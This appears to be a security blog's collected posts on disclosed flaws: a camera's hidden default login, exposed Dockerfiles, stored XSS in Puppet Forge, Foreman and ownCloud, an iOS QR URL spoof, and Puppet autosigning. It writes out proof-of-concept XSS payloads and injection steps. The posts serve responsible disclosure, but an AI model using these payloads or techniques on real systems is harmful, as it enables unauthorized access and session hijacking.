By modifying the authentication packet which the mobile application sends to the camera and simply replace the string “admin” with “Default” (as well as supplying the password “123456” with it), this user is being used to login to the camera. That user has permissions to view the video stream. A PoC has been published on GitHub.

Even if the user did change the password an attacker can now view the video stream using the “Default” user. This is again possible even if the camera is behind a firewall or NAT device as long as outbound internet connectivity is available to it.

Conclusion

The vulnerabilities found in the analysis were far more critical than what I had expected.

The fact that this camera does not clearly communicate that it is publicly reachable even if deployed in an internal network is very dangerous, I suspect many users aren’t changing the default password since they believe that the device is not accessible anyway.

However due to the hidden “Default” user which cannot be disabled, this doesn’t matter much at all. Changing the password is almost pointless. Every stream can be viewed by unauthorized attackers. The device IDs are not nearly random enough to protect the cameras from being found. Chaining these vulnerabilities together, an attacker can simply iterate over all online cameras and view their video stream.

If you own such a camera, I would recommend to disconnect it immediately. A patch for these flaws is currently not available.

Disclosure timeline

2020-07-23: Attempted to contact Conrad through Twitter since no other direct contact information could be found, BASETech doesn’t even operate a website.
2020-07-29: Attempted to contact Conrad through the email address displayed on their imprint page
2020-08-06: Conrad confirmed that to be to correct channel, requests details
2020-08-06: Sent details of vulnerabilities
2020-09-08: Conrad states that the vulnerabilities have been forwarded to their supplier, additionally state that this camera will be temporarily not sold by them anymore until an update is published
2020-09-18: Requesting an update, camera is still being sold in the online shop
2020-09-18: Conrad states that they will internally investigate
2020-10-22: Requesting an update, camera is still being sold in the online shop
2020-10-26: Conrad states that they will again internally investigate
2020-11-02: CVE-2020-27553, CVE-2020-27554, CVE-2020-27555, CVE-2020-27556, CVE-2020-27557 and CVE-2020-27558 have been assigned to these vulnerabilities
2020-11-04: Publication of this blog post, camera is still being sold in the online shop

Scanning the Alexa top 1M sites for Dockerfiles

Intro

Recently I stumbled over a site which publicly served their Dockerfile. That particular instance wasn’t very interesting. But I started to wonder how widespread this is and what sites are exposing due to that.

By all means, this isn’t exactly new. You can find /Dockerfile in the SecLists repository for a while.
However, it seems that so far nobody (publicly) investigated this. I’m also still operating a bunch of sites that are in the top 1 million list and I couldn’t find a single request for this file in my (limited) log files.

So I’ve started to do my own scan of the Alexa top 1 Million sites list.
This work was heavily inspired by the research of Hanno Böck in the past and in particular I used his wonderful tool snallygaster to conduct most of the scans. Thanks Hanno!

What is a Dockerfile?

A Dockerfile is the blueprint of a container. It contains all commands needed to build it. It is a simple plaintext file. You can tell Docker to copy files into the container, expose network ports and of course run any command during the build, for example:


FROM nginx

COPY default.conf /etc/nginx/conf.d/default.conf

COPY html/ /usr/share/nginx/html

RUN echo "192.168.1.14 mysql" >> /etc/hosts

EXPOSE 80

Basically you describe exactly how the container is configured, which packages are installed and what commands are being ran in the process of building it.

As you can see it doesn’t necessarily contain sensitive information. In the above example we don’t even see which files are copied to the NGINX document root.

Results

Out of the 1’000’000 sites 659 served a Dockerfile.
There is large reuse of existing Dockerfiles, one in particular was used 105 times.
Overall this boils down to 338 unique Dockerfiles being served.

41 were used two times or more, in detail:

The remaining 298 were uniquely used by only one site.

Most of them did fairly innocent operations that didn’t tell us much such as:

Not much there that we couldn’t also figure out by looking at the site directly.

A lot of them gave us a very detailed view of what is probably running on the server, e.g.:

It’s nice to know exactly which PHP modules are used on the server, this might be useful in some cases.

But as I dug deeper I found sometimes not only the Dockerfile was exposed but also much of the referenced configuration files. For example in the Dockerfile “docker/nginx.conf” is copied:

Which we then can simply try to access like this:

Somewhat common in that scenario are TLS certificates and, well, keys. I’ve found around 10 of those, for example:

And some people simply do insane things in their Dockerfile, like exposing their AWS secret key:

Or using a tool called “sshpass” to pipe a password into ssh to automate a rsync:

And at least one SSH root key is being served:

Overall I found SSH keys, npm tokens, TLS keys, passwords, AWS secrets, Amazon SES credentials, countless configuration files and source code of some of the applications.

These are of course the extreme examples which are to be expected on such a wide range scan.

How does this happen?

By default the Dockerfile is not copied into the container and certainly not to a publicly served folder.

From what I can tell the mistake that most of these sites make is practically this (real example from the scan):

With the first COPY line they copy everything in the current folder to a publicly served folder.
Afterwards configuration files get copied.

With this both the nginx.conf and the complete ssl directory are public. We can now simply fetch the nginx.conf, lookup the name of the certificate and key files and then fetch those as well.

In some cases there was no such COPY command. I can only guess that the files ended up due to another mistake in the document root, possibly unrelated to Docker.

Conclusion

With only 0.066 % of sites exposing a Dockerfile this doesn’t look like a very widespread problem. And on top of that only a subset of those – less than 100 – expose really critical information that can lead to a compromise.

But in any case, it rarely makes sense to publicly serve a Dockerfile.
Even if you don’t include any keys, passwords or other secrets: It still doesn’t make sense to give everyone a blueprint of your system.
The sites that don’t expose anything critical right now might start in the future when changes are made to this seemingly private file.

It’s generally good advice – even if you don’t use Docker – to simply check your public webroot folder for any files that shouldn’t be there and remove them.

 

XSS on forge.puppet.com

I found a vulnerability on forge.puppet.com which allowed me to store XSS on their module page for a module I own.
User interaction was still required to execute the JavaScript payload by hovering over a link on the page, thus the risk was rather limited.

The issue was that not all values in metadata.json of uploaded modules were correctly sanitized. You could upload a module with the following metadata.json payload (abbreviated):

  "operatingsystem_support": [
    {
      "operatingsystem":"CentOS",
      "operatingsystemrelease":[ "5", "6", "7<script>alert('xss')</script>" ]
    }
  ],

When a user then visited the module page and hovered over the “CentOS” link, to figure out which versions are supported, then the JavaScript payload would be executed:

This issue has been fixed by the Puppet team.

Timeline:
2018-03-24 – Issue was reported to the Puppet security team.
2018-04-01 – Asking for feedback if the report has been received.
2018-04-01 – Puppet security team confirms and says it’s added to their backlog.
2018-06-13 – Asking for feedback if the issue is resolved.
2018-06-13 – Puppet security team confirms it’s fixed, possibly already since March.

 

iOS camera QR code URL parser bug

I’ve learned recently that the iOS 11 camera app will now automatically scan QR codes and interpret them.
This is pretty cool, until now you needed special apps to do that for you on iOS.
When scanning a QR code which contains a URL – in this case https://infosec.rm-it.de/ –  iOS will show a notification like this:

Naturally the first thing I want to try is to construct a QR code which will show an unsuspicious hostname in the notification but then open another URL in Safari.

And this is exactly what I found after a few minutes. Here it is in action:

There is no redirect misuse being done on facebook.com, Safari will only access infosec.rm-it.de.

Details:

If you scan this QR code with the iOS (11.2.1) camera app:

The URL embedded in the QR code is:
https://xxx\@facebook.com:443@infosec.rm-it.de/

It will show this notification:

But if you tap it to open the site, it will instead open https://infosec.rm-it.de/:

The URL parser of the camera app has a problem here detecting the hostname in this URL in the same way as Safari does.
It probably detects “xxx\” as the username to be sent to “facebook.com:443”.
While Safari might take the complete string “xxx\@facebook.com” as a username and “443” as the password to be sent to infosec.rm-it.de.
This leads to a different hostname being displayed in the notification compared to what actually is opened in Safari.

This issue has been reported to the Apple security team on 2017-12-23.
As of today (2018-03-24) this is still not fixed.

Update:
On 2018-04-24 this has been fixed with iOS 11.3.1 and macOS 10.13.4.
CVE-2018-4187 has been assigned to both issues.

 

Stored XSS in Foreman

Following up a bit on my recent post “Looking at public Puppet servers” I was wondering how an attacker could extend his rights within the Puppet ecosystem especially when a system like Foreman is used. Cross site scripting could be useful for this, gaining access to Foreman would allow an attacker basically to compromise everything.

I’ve focused first on facts. Facts are generated by the local system and can be overwritten given enough permissions. Displaying facts in the table seemed to be secured sufficiently, however there is another function on the /fact_values page: Showing an distribution graph of a specific fact.

When the graph is displayed HTML tags are not removed from facts and XSS is possible. Both in the fact name (as a header in the chart) and fact value (in the legend of the chart).

For example, add two new facts by running:


mkdir -p /etc/facter/facts.d/
cat << EOF >> /etc/facter/facts.d/xss.yaml
---
aaa_test_fact<script>alert(1)</script>: xxx
aab_test_fact: x<script>alert(1)</script>xx
EOF

It will shop up like this in the global /fact_values page:

Clicking on the “Show distribution chart” action on either of those facts will execute the provided alert(1) JavaScript:

That’s fun but not really useful, tricking someone to click on the distribution chart of such a weird fact seems impractical.

But since the XSS is in the value of the fact we can just overwrite more interesting facts on that node and hope that an Administrator wants to see the distribution of that fact. For example, let’s add this to xss.yaml:

kernelversion: x><script>alert(1)</script>xx

Now if an Administrator wants to know the distribution of kernel versions in his environment and he uses this chart feature on any host the alert(1) JavaScript will get executed. This is what any other node will look like:

And after navigating to the kernelversion distribution chart on that page:

Still some interaction needed. I’ve noticed that on the general /statistics page the same graphs are used and facts like “manufacturer” are used in them. Unlike the other graphs these do not have a legend. But when you hover over a portion of the graph you’ll get a tooltip with the fact value. This is again vulnerable to XSS. For example add to xss.yaml:

manufacturer: x<img src='/' onerror='alert(1)'>x

Now when you visit the /statistics page and move the mouse over the hardware graph, the alert(1) will execute:

Still needs interaction. But if you inject a value into all the graphs it may not take long for an Administrator to hover over one of those.

However: By default Foreman uses CSP. Stealing someones session with this setup is not easily possible. So my initial plan to steal an Administrators Foreman session failed in the end.

This was tested on Foreman 1.15.6 and reported to the Foreman security team on 2017-10-31.
CVE-2017-15100 has been assigned to this issue.
A fix is already implemented and will be released with version 1.16.0.

 

Looking at public Puppet servers

This is about research I did a while ago but only now had time to finally write about.

In the beginning of this year I was curious to see how many Puppet 3 servers – back then freshly end of life – were connected directly to the internet:

If you don’t know Puppet: It’s a configuration management system that contains information to deploy systems and services in your infrastructure. You write code which defines how a system should be configured e.g. which software to install, which users to deploy, how a service is configured, etc.
It typically uses a client-server model, the clients periodically pull the configuration (“catalog”) from their configured server and apply it locally. Everything is transferred over TLS encrypted connections.

Puppet uses TLS client certificates to authenticate nodes. When a client (“puppet agent”) connects for the first time to a server it will generate a key locally and submit a certificate signing request to the server.
A operator needs to sign the certificate and from that point on the agent can pull its configuration from the server.

However it’s possible to configure Puppet server to simply automatically sign all incoming CSRs.
This is obviously not recommended to do unless you want anyone to get possibly sensitive information about your infrastructure. The Puppet documentation mentions several times that this is insecure: https://docs.puppet.com/puppet/3.8/ssl_autosign.html#nave-autosigning

First I was interested if anyone is already looking for servers configured like this.
I’ve setup a honeypot Puppet server with auto-signing enabled and waited.
But after months there still was not a single CSR submitted, only port scanners tried to connect to it.

I’ve decided to look for those servers myself.
With a small script I looped over around 2500 still online servers – there were still more but due to time constraints I only checked 2500. I’ve built a system which connects to all of those systems and submits a CSR. The “certname” – this is what operators will see when reviewing CSRs – was always the same and it was pretty obvious that it is not a legitimate request.
An attacker would do more recon, get the FQDNs of the Puppet server from its certificate and try to guess a more likely name.

Out of those 2500 servers:
89 immediately signed our certificate.

Out of those 89:
50 compiled a valid catalog that could have been applied directly.
39 tried to compile a catalog and failed with issues that could potentially be worked around on the client but no time was spent on that.

It is a normal setup to have a default role. If a unknown node connects it may get only this configuration applied. Usually this deploys the Administrator user accounts and sets generic settings. This happened a lot and that is already problematic since the system accounts also get their password hash configured which now could be brute-forced. And a lot of them also conveniently send along their sudoers configuration. An attacker could target higher privileged accounts directly.
But some of those servers assigned more generic roles automatically. Exposing root SSH keys, AWS credentials, configuration files of their services (Nginx, PostgreSQL, MySQL, …), tried to copy source code to it, passwords / password hashes of database and other service users:

And more. There are systems that could be immediately compromised with the information that they leak. The others at least tell attackers a lot about the system which makes further attacks much easier.

Here is where it gets interesting: One day later I connected again to the same 2500 servers using the same keys from the day before trying to retrieve a catalog. Normally we’d expect the number now to be stable or slightly less. But in this case it’s not:

145 servers allowed us to connect.
58 gave us a valid catalog that could be applied.

And one week later:
159 servers allowed us to connect.
63 gave us a valid catalog that could be applied.

Those servers were not offline during the first round either. They simply signed my CSR in the meantime without noticing that it’s none of their requests or I suspect that this is the combination of the following two items:

1) Generally when you are working with Puppet certificates you’ll be using “puppet cert $sub-command” to handle the TLS operations for you.

The problem is, that there is no way to tell it to simply reject a signing request.
You can “revoke” or “clean” certificates but it has to be signed first (see: https://tickets.puppetlabs.com/browse/PUP-1916).
There may have been an option using the “puppet ca” command, but it has been deprecated and pretty much every documentation only mentions “puppet cert” nowadays.

You are left with these options:

  • Manually figure out where the .csr file is stored on the server and remove it
  • Use the deprecated tool “puppet ca destroy $certname”
  • Run “puppet cert sign $certname && puppet cert clean $certname”
  • Run “puppet cert sign $certname && puppet cert revoke $certname”

Some are unfortunately using the last two options.

There is the possibility that on some of those systems my certificate request was signed if only for a few seconds. Which brings us to the next issue:

2) Puppet server or in some cases the reverse proxy in front of it will only read the certificate revocation list at startup time.
If you don’t restart these services after revoking a certificate, it will still be allowed to connect.

“puppet cert revoke $certname” basically only adds the certificate to the CRL. It does not remove the signed certificate from the server.
I suspect that some operators have signed and revoked my certificate but haven’t restarted the service afterwards.

On the other hand “puppet cert clean $certname” will additionally remove the signed certificate from the server, when my client connects later it cannot get the signed certificate and is locked out.
This isn’t perfect either. If the client constantly requests the certificate it could retrieve it before the “clean” ran, but it is far better than only using “revoke”.

Depending on how you use Puppet, it may be one of your most critical systems containing the keys to your kingdom. There are very few cases where it makes sense to expose a Puppet server directly to the internet.
Those systems should be the best protected systems in your infrastructure, a compromised Puppet server essentially compromises all clients that are connecting to it.

Basic or naïve auto-signing should not be used in a production environment unless you can ensure that only trusted clients can reach the Puppet server. Only policy-based auto-signing or manual signing is secure otherwise.

XSS in ownCloud 2

A few weeks ago ownCloud 4.0.0 was released and it included some cool features like encryption of uploaded files. I decided to take it for a spin again.

I found again some XSS vulnerabilities. As last time, I reported these issues to the ownCloud team which responded quickly and fixed them already (with version 4.0.2). As far as I can tell CVE-2012-4396 was assigned to these issues (and others were merged into it as well).

/?app=media
1) change ID3 title tag of a MP3 file to: “Kalimba<script>alert(1)</script>”
2) upload
3) play it in the integrated player, JS gets executed

Now this is fun! Imagine someone sending you a MP3 which you listen to with ownCloud and in the background your cookies are sent to a remote system. If you run a ownCloud instance with multiple users, you can also share those files. It might be enough to listen to a shared MP3 to get your account compromised, I didn’t verify this though.

/?app=files&getfile=download.php
1) upload picture e.g. trollface.jpg
2) rename picture to “trollf<style onload=alert(1)>ace.jpg”
3) view the picture, JS gets executed

Can’t think of a good scenario for this to be useful. Maybe sharing this file.

/?app=calendar
1) add new appointment, title: “XSS <script>alert(1);</script>”
2) switch calendar view to “list”, JS gets executed

This was a bit surprising as the normal calendar view was not affected, only the list view.

XSS in ownCloud

A few weeks ago there was a bit of a hype about ownCloud when they released version 3.0.1. I decided to give it a spin, here is what I found.

Note: I contacted the development team earlier and these vulnerabilities have been fixed in the meantime with version 3.0.2, although I have not confirmed this myself due to lack of time.

XSS in files/download.php

The attacker can send an URL to the victim and JavaScript will be executed in the victims session. The attacker does not need an account on the ownCloud instance, only knowledge about the URL path:


http://localhost/owncloud/files/download.php?file=/xss.png%3Cscript%3Ealert(1)%3C/script%3E

XSS in files/index.php

If you share your ownCloud instance with multiple users, the attacker can send an URL to the victim and JavaScript will be executed in the victims session. Both the attacker and victim need accounts on the same instance.

Here is how:

1) Create a new folder on http://localhost/owncloud/files/index.php – any name will do, I used “PoC”

2) Share this folder with your victim or the victims group

3) Switch to http://localhost/owncloud/files/index.php?dir=/PoC

4) Create a folder, called:

x"> <body onload=alert(1)><x="

5) Send that link to your victim:


http://localhost/owncloud/files/index.php?dir=/Shared/PoC/x%22%3E%20%3Cbody%20onload%3Dalert%281%29%3E%3Cx%3D%22

6) ???

7) Profit!

It may be possible to create the folder directly in /, however I couldn’t get that folder shared with other users. But since it gets automatically shared if the parent folder is shared, I didn’t invest much time into that.

XSS in apps/contacts/index.php

I found another XSS flaw in the Contacts function, creating a contact and adding this in any field:

foo"><script>alert(1)</script>

will also execute. However, since you cannot share contacts between users (or can you?) I believe this is a minor problem.